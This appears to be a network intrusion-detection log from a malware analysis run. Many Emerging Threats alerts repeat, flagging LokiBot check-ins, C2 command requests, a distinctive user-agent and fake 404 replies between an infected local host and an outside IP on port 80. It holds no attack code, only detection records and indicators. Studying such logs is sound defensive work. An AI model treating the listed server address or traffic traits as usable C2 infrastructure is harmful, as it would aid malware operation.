                                              03/15/21-20:01:35.414646TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.587.251.79.157
                                              03/15/21-20:01:35.414646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.587.251.79.157
                                              03/15/21-20:01:37.513857TCP2025483ET TROJAN LokiBot Fake 404 Response804974387.251.79.157192.168.2.5
                                              03/15/21-20:01:37.905678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.587.251.79.157
                                              03/15/21-20:01:37.905678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.587.251.79.157
                                              03/15/21-20:01:37.905678TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.587.251.79.157
                                              03/15/21-20:01:37.905678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.587.251.79.157
                                              03/15/21-20:01:38.861871TCP2025483ET TROJAN LokiBot Fake 404 Response804974487.251.79.157192.168.2.5
                                              03/15/21-20:01:39.134248TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.134248TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.134248TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.134248TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.420018TCP2025483ET TROJAN LokiBot Fake 404 Response804974587.251.79.157192.168.2.5
                                              03/15/21-20:01:39.905942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.587.251.79.157
                                              03/15/21-20:01:39.905942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.587.251.79.157
                                              03/15/21-20:01:39.905942TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.587.251.79.157
                                              03/15/21-20:01:39.905942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.587.251.79.157
                                              03/15/21-20:01:40.780756TCP2025483ET TROJAN LokiBot Fake 404 Response804974687.251.79.157192.168.2.5
                                              03/15/21-20:01:41.068304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.068304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.068304TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.068304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.614192TCP2025483ET TROJAN LokiBot Fake 404 Response804974787.251.79.157192.168.2.5
                                              03/15/21-20:01:41.839658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.587.251.79.157
                                              03/15/21-20:01:41.839658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.587.251.79.157
                                              03/15/21-20:01:41.839658TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.587.251.79.157
                                              03/15/21-20:01:41.839658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.587.251.79.157
                                              03/15/21-20:01:42.790277TCP2025483ET TROJAN LokiBot Fake 404 Response804974887.251.79.157192.168.2.5
                                              03/15/21-20:01:43.049676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.049676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.049676TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.049676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.664398TCP2025483ET TROJAN LokiBot Fake 404 Response804974987.251.79.157192.168.2.5
                                              03/15/21-20:01:43.914421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.587.251.79.157
                                              03/15/21-20:01:43.914421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.587.251.79.157
                                              03/15/21-20:01:43.914421TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.587.251.79.157
                                              03/15/21-20:01:43.914421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.587.251.79.157
                                              03/15/21-20:01:44.222182TCP2025483ET TROJAN LokiBot Fake 404 Response804975087.251.79.157192.168.2.5
                                              03/15/21-20:01:44.462000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.462000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.462000TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.462000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.709526TCP2025483ET TROJAN LokiBot Fake 404 Response804975187.251.79.157192.168.2.5
                                              03/15/21-20:01:44.936401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.587.251.79.157
                                              03/15/21-20:01:44.936401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.587.251.79.157
                                              03/15/21-20:01:44.936401TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.587.251.79.157
                                              03/15/21-20:01:44.936401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.587.251.79.157
                                              03/15/21-20:01:45.928818TCP2025483ET TROJAN LokiBot Fake 404 Response804975287.251.79.157192.168.2.5
                                              03/15/21-20:01:46.167455TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.167455TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.167455TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.167455TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.622527TCP2025483ET TROJAN LokiBot Fake 404 Response804975387.251.79.157192.168.2.5
                                              03/15/21-20:01:46.877666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.587.251.79.157
                                              03/15/21-20:01:46.877666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.587.251.79.157
                                              03/15/21-20:01:46.877666TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.587.251.79.157
                                              03/15/21-20:01:46.877666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.587.251.79.157
                                              03/15/21-20:01:47.542125TCP2025483ET TROJAN LokiBot Fake 404 Response804975487.251.79.157192.168.2.5
                                              03/15/21-20:01:47.791489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.587.251.79.157
                                              03/15/21-20:01:47.791489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.587.251.79.157
                                              03/15/21-20:01:47.791489TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.587.251.79.157
                                              03/15/21-20:01:47.791489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.587.251.79.157
                                              03/15/21-20:01:48.513505TCP2025483ET TROJAN LokiBot Fake 404 Response804975587.251.79.157192.168.2.5
                                              03/15/21-20:01:48.767345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.587.251.79.157
                                              03/15/21-20:01:48.767345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.587.251.79.157
                                              03/15/21-20:01:48.767345TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.587.251.79.157
                                              03/15/21-20:01:48.767345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.587.251.79.157
                                              03/15/21-20:01:49.270062TCP2025483ET TROJAN LokiBot Fake 404 Response804975687.251.79.157192.168.2.5
                                              03/15/21-20:01:49.520613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.520613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.520613TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.520613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.785250TCP2025483ET TROJAN LokiBot Fake 404 Response804975787.251.79.157192.168.2.5
                                              03/15/21-20:01:50.051361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.051361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.051361TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.051361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.317365TCP2025483ET TROJAN LokiBot Fake 404 Response804975887.251.79.157192.168.2.5
                                              03/15/21-20:01:50.560163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.560163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.560163TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.560163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.805489TCP2025483ET TROJAN LokiBot Fake 404 Response804975987.251.79.157192.168.2.5
                                              03/15/21-20:01:51.055531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.055531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.055531TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.055531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.371976TCP2025483ET TROJAN LokiBot Fake 404 Response804976087.251.79.157192.168.2.5
                                              03/15/21-20:01:51.624270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.624270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.624270TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.624270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.938138TCP2025483ET TROJAN LokiBot Fake 404 Response804976187.251.79.157192.168.2.5
                                              03/15/21-20:01:52.186493TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.186493TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.186493TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.186493TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.449353TCP2025483ET TROJAN LokiBot Fake 404 Response804976287.251.79.157192.168.2.5
                                              03/15/21-20:01:52.696929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.587.251.79.157
                                              03/15/21-20:01:52.696929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.587.251.79.157
                                              03/15/21-20:01:52.696929TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.587.251.79.157
                                              03/15/21-20:01:52.696929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.587.251.79.157
                                              03/15/21-20:01:53.726037TCP2025483ET TROJAN LokiBot Fake 404 Response804976387.251.79.157192.168.2.5
                                              03/15/21-20:01:53.959341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.587.251.79.157
                                              03/15/21-20:01:53.959341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.587.251.79.157
                                              03/15/21-20:01:53.959341TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.587.251.79.157
                                              03/15/21-20:01:53.959341TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.587.251.79.157
                                              03/15/21-20:01:54.642891TCP2025483ET TROJAN LokiBot Fake 404 Response804976487.251.79.157192.168.2.5
                                              03/15/21-20:01:54.879328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.587.251.79.157
                                              03/15/21-20:01:54.879328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.587.251.79.157
                                              03/15/21-20:01:54.879328TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.587.251.79.157
                                              03/15/21-20:01:54.879328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.587.251.79.157
                                              03/15/21-20:01:55.280209TCP2025483ET TROJAN LokiBot Fake 404 Response804976587.251.79.157192.168.2.5
                                              03/15/21-20:01:55.525891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.587.251.79.157
                                              03/15/21-20:01:55.525891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.587.251.79.157
                                              03/15/21-20:01:55.525891TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.587.251.79.157
                                              03/15/21-20:01:55.525891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.587.251.79.157
                                              03/15/21-20:01:55.944955TCP2025483ET TROJAN LokiBot Fake 404 Response804976687.251.79.157192.168.2.5
                                              03/15/21-20:01:56.202304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.587.251.79.157
                                              03/15/21-20:01:56.202304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.587.251.79.157
                                              03/15/21-20:01:56.202304TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.587.251.79.157
                                              03/15/21-20:01:56.202304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.587.251.79.157
                                              03/15/21-20:01:57.125554TCP2025483ET TROJAN LokiBot Fake 404 Response804976787.251.79.157192.168.2.5
                                              03/15/21-20:01:57.369297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.587.251.79.157
                                              03/15/21-20:01:57.369297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.587.251.79.157
                                              03/15/21-20:01:57.369297TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.587.251.79.157
                                              03/15/21-20:01:57.369297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.587.251.79.157
                                              03/15/21-20:01:58.576225TCP2025483ET TROJAN LokiBot Fake 404 Response804976887.251.79.157192.168.2.5
                                              03/15/21-20:01:58.816874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.587.251.79.157
                                              03/15/21-20:01:58.816874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.587.251.79.157
                                              03/15/21-20:01:58.816874TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.587.251.79.157
                                              03/15/21-20:01:58.816874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.587.251.79.157
                                              03/15/21-20:02:01.043610TCP2025483ET TROJAN LokiBot Fake 404 Response804976987.251.79.157192.168.2.5
                                              03/15/21-20:02:01.283553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.587.251.79.157
                                              03/15/21-20:02:01.283553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.587.251.79.157
                                              03/15/21-20:02:01.283553TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.587.251.79.157
                                              03/15/21-20:02:01.283553TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.587.251.79.157
                                              03/15/21-20:02:02.824487TCP2025483ET TROJAN LokiBot Fake 404 Response804977087.251.79.157192.168.2.5
                                              03/15/21-20:02:03.077740TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.587.251.79.157
                                              03/15/21-20:02:03.077740TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.587.251.79.157
                                              03/15/21-20:02:03.077740TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.587.251.79.157
                                              03/15/21-20:02:03.077740TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.587.251.79.157
                                              03/15/21-20:02:04.348325TCP2025483ET TROJAN LokiBot Fake 404 Response804977187.251.79.157192.168.2.5
                                              03/15/21-20:02:04.590108TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.587.251.79.157
                                              03/15/21-20:02:04.590108TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.587.251.79.157
                                              03/15/21-20:02:04.590108TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.587.251.79.157
                                              03/15/21-20:02:04.590108TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.587.251.79.157
                                              03/15/21-20:02:04.969626TCP2025483ET TROJAN LokiBot Fake 404 Response804977287.251.79.157192.168.2.5
                                              03/15/21-20:02:05.213260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.587.251.79.157
                                              03/15/21-20:02:05.213260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.587.251.79.157
                                              03/15/21-20:02:05.213260TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.587.251.79.157
                                              03/15/21-20:02:05.213260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.587.251.79.157
                                              03/15/21-20:02:06.222766TCP2025483ET TROJAN LokiBot Fake 404 Response804977387.251.79.157192.168.2.5
                                              03/15/21-20:02:06.466253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.587.251.79.157
                                              03/15/21-20:02:06.466253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.587.251.79.157
                                              03/15/21-20:02:06.466253TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.587.251.79.157
                                              03/15/21-20:02:06.466253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.587.251.79.157
                                              03/15/21-20:02:06.855093TCP2025483ET TROJAN LokiBot Fake 404 Response804977487.251.79.157192.168.2.5
                                              03/15/21-20:02:07.107955TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.587.251.79.157
                                              03/15/21-20:02:07.107955TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.587.251.79.157
                                              03/15/21-20:02:07.107955TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.587.251.79.157
                                              03/15/21-20:02:07.107955TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.587.251.79.157
                                              03/15/21-20:02:07.447950TCP2025483ET TROJAN LokiBot Fake 404 Response804977587.251.79.157192.168.2.5
                                              03/15/21-20:02:07.692995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.587.251.79.157
                                              03/15/21-20:02:07.692995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.587.251.79.157
                                              03/15/21-20:02:07.692995TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.587.251.79.157
                                              03/15/21-20:02:07.692995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.587.251.79.157
                                              03/15/21-20:02:08.081755TCP2025483ET TROJAN LokiBot Fake 404 Response804977687.251.79.157192.168.2.5
                                              03/15/21-20:02:08.323690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.587.251.79.157
                                              03/15/21-20:02:08.323690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.587.251.79.157
                                              03/15/21-20:02:08.323690TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.587.251.79.157
                                              03/15/21-20:02:08.323690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.587.251.79.157
                                              03/15/21-20:02:08.578048TCP2025483ET TROJAN LokiBot Fake 404 Response804977787.251.79.157192.168.2.5
                                              03/15/21-20:02:08.825503TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.587.251.79.157
                                              03/15/21-20:02:08.825503TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.587.251.79.157
                                              03/15/21-20:02:08.825503TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.587.251.79.157
                                              03/15/21-20:02:08.825503TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.587.251.79.157
                                              03/15/21-20:02:09.077586TCP2025483ET TROJAN LokiBot Fake 404 Response804977887.251.79.157192.168.2.5
                                              03/15/21-20:02:09.317701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.587.251.79.157
                                              03/15/21-20:02:09.317701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.587.251.79.157
                                              03/15/21-20:02:09.317701TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.587.251.79.157
                                              03/15/21-20:02:09.317701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.587.251.79.157
                                              03/15/21-20:02:09.824424TCP2025483ET TROJAN LokiBot Fake 404 Response804977987.251.79.157192.168.2.5
                                              03/15/21-20:02:10.069426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.587.251.79.157
                                              03/15/21-20:02:10.069426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.587.251.79.157
                                              03/15/21-20:02:10.069426TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.587.251.79.157
                                              03/15/21-20:02:10.069426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.587.251.79.157
                                              03/15/21-20:02:10.848664TCP2025483ET TROJAN LokiBot Fake 404 Response804978087.251.79.157192.168.2.5
                                              03/15/21-20:02:11.104056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.587.251.79.157
                                              03/15/21-20:02:11.104056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.587.251.79.157
                                              03/15/21-20:02:11.104056TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.587.251.79.157
                                              03/15/21-20:02:11.104056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.587.251.79.157
                                              03/15/21-20:02:11.962513TCP2025483ET TROJAN LokiBot Fake 404 Response804978187.251.79.157192.168.2.5
                                              03/15/21-20:02:12.211473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.587.251.79.157
                                              03/15/21-20:02:12.211473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.587.251.79.157
                                              03/15/21-20:02:12.211473TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.587.251.79.157
                                              03/15/21-20:02:12.211473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.587.251.79.157
                                              03/15/21-20:02:12.662556TCP2025483ET TROJAN LokiBot Fake 404 Response804978287.251.79.157192.168.2.5
                                              03/15/21-20:02:12.901437TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.587.251.79.157
                                              03/15/21-20:02:12.901437TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.587.251.79.157
                                              03/15/21-20:02:12.901437TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.587.251.79.157
                                              03/15/21-20:02:12.901437TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.587.251.79.157
                                              03/15/21-20:02:13.555650TCP2025483ET TROJAN LokiBot Fake 404 Response804978387.251.79.157192.168.2.5
                                              03/15/21-20:02:13.800785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.587.251.79.157
                                              03/15/21-20:02:13.800785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.587.251.79.157
                                              03/15/21-20:02:13.800785TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.587.251.79.157
                                              03/15/21-20:02:13.800785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.587.251.79.157
                                              03/15/21-20:02:14.919122TCP2025483ET TROJAN LokiBot Fake 404 Response804978487.251.79.157192.168.2.5
                                              03/15/21-20:02:15.165407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.587.251.79.157
                                              03/15/21-20:02:15.165407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.587.251.79.157
                                              03/15/21-20:02:15.165407TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.587.251.79.157
                                              03/15/21-20:02:15.165407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.587.251.79.157
                                              03/15/21-20:02:15.736679TCP2025483ET TROJAN LokiBot Fake 404 Response804978587.251.79.157192.168.2.5
                                              03/15/21-20:02:15.977432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.587.251.79.157
                                              03/15/21-20:02:15.977432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.587.251.79.157
                                              03/15/21-20:02:15.977432TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.587.251.79.157
                                              03/15/21-20:02:15.977432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.587.251.79.157
                                              03/15/21-20:02:16.341683TCP2025483ET TROJAN LokiBot Fake 404 Response804978687.251.79.157192.168.2.5
                                              03/15/21-20:02:16.606063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.587.251.79.157
                                              03/15/21-20:02:16.606063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.587.251.79.157
                                              03/15/21-20:02:16.606063TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.587.251.79.157
                                              03/15/21-20:02:16.606063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.587.251.79.157
                                              03/15/21-20:02:16.868801TCP2025483ET TROJAN LokiBot Fake 404 Response804978787.251.79.157192.168.2.5
                                              03/15/21-20:02:17.111440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.587.251.79.157
                                              03/15/21-20:02:17.111440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.587.251.79.157
                                              03/15/21-20:02:17.111440TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.587.251.79.157
                                              03/15/21-20:02:17.111440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.587.251.79.157
                                              03/15/21-20:02:17.387170TCP2025483ET TROJAN LokiBot Fake 404 Response804978887.251.79.157192.168.2.5
                                              03/15/21-20:02:17.638517TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.587.251.79.157
                                              03/15/21-20:02:17.638517TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.587.251.79.157
                                              03/15/21-20:02:17.638517TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.587.251.79.157
                                              03/15/21-20:02:17.638517TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.587.251.79.157
                                              03/15/21-20:02:17.889045TCP2025483ET TROJAN LokiBot Fake 404 Response804978987.251.79.157192.168.2.5
                                              03/15/21-20:02:18.140709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.587.251.79.157
                                              03/15/21-20:02:18.140709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.587.251.79.157
                                              03/15/21-20:02:18.140709TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.587.251.79.157
                                              03/15/21-20:02:18.140709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.587.251.79.157
                                              03/15/21-20:02:18.950899TCP2025483ET TROJAN LokiBot Fake 404 Response804979087.251.79.157192.168.2.5
                                              03/15/21-20:02:19.191851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.587.251.79.157
